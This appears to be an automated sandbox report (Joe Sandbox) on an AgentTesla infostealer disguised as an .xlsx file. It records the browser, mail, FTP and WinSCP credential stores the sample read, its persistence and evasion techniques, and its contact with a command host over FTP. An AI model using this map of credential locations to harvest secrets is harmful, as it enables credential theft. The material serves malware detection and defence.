                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.adobe.exe.2a7f0b8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.adobe.exe.2a7f0b8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.adobe.exe.2a7f0b8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.adobe.exe.2a7f0b8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        Registry Run Keys / Startup Folder
                        112
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Registry Run Keys / Startup Folder
                        12
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        1
                        Query Registry
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                        Software Packing
                        NTDS211
                        Security Software Discovery
                        Distributed Component Object Model21
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp
                        LSA Secrets2
                        Process Discovery
                        SSH1
                        Clipboard Data
                        23
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials141
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                        Masquerading
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                        Virtualization/Sandbox Evasion
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                        Process Injection
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Hidden Files and Directories
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479357 Sample: BL NBNSA240600050.xlsx.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 30 s4.serv00.com 2->30 32 api.ipify.org 2->32 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 11 other signatures 2->58 7 BL NBNSA240600050.xlsx.exe 3 2->7         started        11 adobe.exe 3 2->11         started        13 adobe.exe 2 2->13         started        signatures3 process4 file5 28 C:\Users\...\BL NBNSA240600050.xlsx.exe.log, ASCII 7->28 dropped 60 Injects a PE file into a foreign processes 7->60 15 BL NBNSA240600050.xlsx.exe 16 4 7->15         started        62 Multi AV Scanner detection for dropped file 11->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->64 66 Machine Learning detection for dropped file 11->66 20 adobe.exe 14 2 11->20         started        22 adobe.exe 13->22         started        signatures6 process7 dnsIp8 34 s4.serv00.com 213.189.52.181, 21, 49734, 49736 ECO-ATMAN-PLECO-ATMAN-PL Poland 15->34 36 api.ipify.org 104.26.12.205, 443, 49732, 49738 CLOUDFLARENETUS United States 15->36 24 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 15->24 dropped 26 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 15->26 dropped 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->38 40 Tries to steal Mail credentials (via file / registry access) 15->40 42 Drops executable to a common third party application directory 15->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->44 46 Tries to harvest and steal ftp login credentials 22->46 48 Tries to harvest and steal browser information (history, passwords, etc) 22->48 50 Installs a global keyboard hook 22->50 file9 signatures10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        BL NBNSA240600050.xlsx.exe74%ReversingLabsWin32.Trojan.AgentTesla
                        BL NBNSA240600050.xlsx.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Adobe\adobe.exe74%ReversingLabsWin32.Trojan.AgentTesla
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://api.ipify.org/0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                        http://www.fontbureau.com0%URL Reputationsafe
                        http://www.fontbureau.com/designersG0%URL Reputationsafe
                        http://www.fontbureau.com/designers/?0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        https://account.dyn.com/0%URL Reputationsafe
                        http://www.fontbureau.com/designers?0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.fontbureau.com/designers0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        https://api.ipify.org/t0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        https://api.ipify.org0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.fontbureau.com/designers80%URL Reputationsafe
                        http://www.fonts.com0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                        http://s4.serv00.com0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          unknown
                          s4.serv00.com
                          213.189.52.181
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersGBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/bTheBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://account.dyn.com/BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/DataSet1.xsdBL NBNSA240600050.xlsx.exe, adobe.exe.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.goodfont.co.krBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.ipify.org/tadobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comlBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netDBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cTheBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.ipify.orgBL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-user.htmlBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sandoll.co.krBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.urwpp.deDPleaseBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.zhongyicts.com.cnBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.1893877251.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sakkal.comBL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://s4.serv00.comBL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.26.12.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            213.189.52.181
                            s4.serv00.comPoland
                            57367ECO-ATMAN-PLECO-ATMAN-PLtrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1479357
                            Start date and time:2024-07-23 15:04:03 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 1s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
